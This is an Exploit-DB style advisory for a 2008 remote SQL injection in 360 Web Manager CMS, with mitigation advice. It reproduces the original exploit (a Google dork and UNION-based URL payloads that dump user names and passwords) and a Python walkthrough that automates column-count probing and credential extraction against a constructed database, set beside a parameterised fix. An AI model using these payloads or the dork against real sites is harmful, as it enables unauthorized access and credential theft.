vendor:
360 Web Manager CMS
by:
Ded MustD!e
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: 360 Web Manager CMS
Affected Version From: Prior to 1.0.1
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:360webmanager:360_web_manager_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

360 Web Manager CMS Remote SQL Injection Vulnerability

360 Web Manager CMS is prone to a remote SQL injection vulnerability. The application fails to sanitize user-supplied input before using it in an SQL query, so an attacker can inject or manipulate the SQL statements executed by the back-end database and read or modify arbitrary data, potentially compromising sensitive information. The published exploit below targets the IDFM parameter of form.php with a UNION-based query that returns user names and password values in place of the page's normal output. This issue affects versions prior to 360 Web Manager CMS 1.0.1.

Mitigation:

Upgrade to version 1.0.1 or later. Where an upgrade cannot be applied immediately, the usual mitigation for this class of bug applies: bind the IDM, IDSM and IDFM values as query parameters (or cast them to integers) instead of concatenating them into the SQL string, and restrict access to the admin panel.
Source (Exploit-DB raw data):

360 Web Manager CMS Remote SQL Injection Vulnerability

Author: Ded MustD!e

Site: http://www.360webmanager.com/

Google Dork: inurl:"IDFM=" "form.php"

Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*

Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*  =)))

Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php

# milw0rm.com [2008-01-20]
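The following is an added worked example, not code from 360 Web Manager CMS or from the exploit author. It models the two steps behind the payload above (matching the column count of the original SELECT, then placing name:password into a displayed column) against a constructed SQLite database, and shows the vulnerable concatenated query next to a parameterised one. The table layout (a three-column form table, a user table with name and password) and the sample rows are assumptions; only the names IDFM, form.php, user, name and password come from the advisory, and the real query reportedly has 20 or more columns.

```python
import sqlite3

# Constructed stand-in for the CMS database (sample data, not from the page).
# The real form.php query reportedly selects 20 or more columns; three are
# enough to show the mechanics. IDFM/form/user/name/password follow the
# advisory; the remaining columns and the rows are invented.
SCHEMA = """
CREATE TABLE form (IDFM INTEGER, title TEXT, body TEXT);
CREATE TABLE user (id INTEGER, name TEXT, password TEXT);
INSERT INTO form VALUES (1, 'Contact', 'Write to us');
INSERT INTO user VALUES (1, 'admin', 'd8578edf8458ce06fbc5bb76a58c5ca4');
INSERT INTO user VALUES (2, 'editor', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, idfm):
    """The pattern the advisory describes: the request parameter is pasted
    straight into the SQL text, so '-1 UNION SELECT ...' becomes part of it."""
    sql = "SELECT IDFM, title, body FROM form WHERE IDFM=" + str(idfm)
    return con.execute(sql).fetchall()


def safe_lookup(con, idfm):
    """Hardened form: the parameter is bound, never interpolated, and anything
    that is not an integer is rejected before it reaches the database."""
    try:
        idfm = int(idfm)
    except (TypeError, ValueError):
        return []
    sql = "SELECT IDFM, title, body FROM form WHERE IDFM=?"
    return con.execute(sql, (idfm,)).fetchall()


def find_column_count(con, lookup, known_id=1, limit=40):
    """Step 1 of a UNION attack: count the columns of the original SELECT.
    'ORDER BY n' works while n <= column count and errors once n exceeds it.
    Returns None when the probes have no effect (input is bound or rejected)."""
    count = None
    for n in range(1, limit + 1):
        try:
            rows = lookup(con, "%d ORDER BY %d" % (known_id, n))
        except sqlite3.OperationalError:
            break  # ORDER BY term out of range: the previous n was the count
        if not rows:
            break  # parameterised path: the injected text changed nothing
        count = n
    return count


def dump_credentials(con, lookup):
    """Step 2: a UNION with a matching column count, with name:password placed
    in a column the page displays (column 2, as in the advisory's payload).
    MySQL's concat_ws(0x3a, name, password) becomes name || ':' || password in
    SQLite; the trailing /* of the original is only needed when SQL follows."""
    n = find_column_count(con, lookup)
    if n is None:
        return []
    slot = 1 if n > 1 else 0
    cols = [str(i) for i in range(1, n + 1)]
    cols[slot] = "name || ':' || password"
    payload = "-1 UNION SELECT %s FROM user" % ", ".join(cols)
    return [row[slot] for row in lookup(con, payload)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", dump_credentials(db, vulnerable_lookup))
    print("hardened:  ", dump_credentials(db, safe_lookup))
```

Against the concatenated query the column probe stops at 3 and the UNION returns both name:password pairs through the title column; against the bound query every probe comes back empty, no column count is found, and nothing is extracted. The same ORDER BY probing is how the "number of columns may be >20" note in the advisory is resolved on a real target.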